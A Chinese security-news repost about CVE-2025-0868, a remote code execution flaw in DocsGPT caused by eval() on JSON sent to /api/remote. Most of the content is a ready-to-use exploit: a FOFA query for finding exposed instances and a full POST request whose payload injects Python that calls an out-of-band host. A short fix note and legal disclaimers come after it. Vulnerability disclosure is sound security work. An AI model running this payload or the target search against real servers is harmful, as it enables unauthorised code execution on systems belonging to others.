漏洞速递 | CVE-2025-0868 RCE漏洞(附EXP)

admin 2025年5月23日13:29:03评论8 views字数 1031阅读3分26秒阅读模式

0x01 前言

    DocsGPT 中存在导致远程代码执行 (RCE) 的漏洞。由于使用 eval() 对 JSON 数据进行解析不当,未经授权的攻击者可发送任意 Python 代码以通过 /api/remote 端点执行

漏洞速递 | CVE-2025-0868 RCE漏洞(附EXP)

0x02 漏洞等级

高危

0x03 漏洞影响

0.8.1<=docsgpt<0.12.0

0x04 漏洞复现

FOFA:
body="Welcome to DocsGPT"
漏洞速递 | CVE-2025-0868 RCE漏洞(附EXP)

EXP:

POST /api/remote HTTP/2Host127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1Priority: u=0, iTe: trailersContent-Type: application/x-www-form-urlencodedContent-Length: 252user=1&source=reddit&name=other&data={"source":"reddit","client_id":"1111","client_secret":1111,"user_agent":"111","search_queries":[""],"number_posts":10,"rce\\":__import__('requests').get('http://dmaxnqikgwvdddcntkfuddpr21k3qa5pw.oast.fun/')}#":11}
漏洞速递 | CVE-2025-0868 RCE漏洞(附EXP)

success

漏洞速递 | CVE-2025-0868 RCE漏洞(附EXP)
注:严禁用于非授权测试

0x05 修复建议

1、关闭互联网暴露面或接口设置访问权限2、升级至安全版本
漏洞速递 | CVE-2025-0868 RCE漏洞(附EXP)

原文始发于微信公众号(渗透Xiao白帽):漏洞速递 | CVE-2025-0868 RCE漏洞(附EXP)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月23日13:29:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞速递 | CVE-2025-0868 RCE漏洞(附EXP)https://cn-sec.com/archives/4089330.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息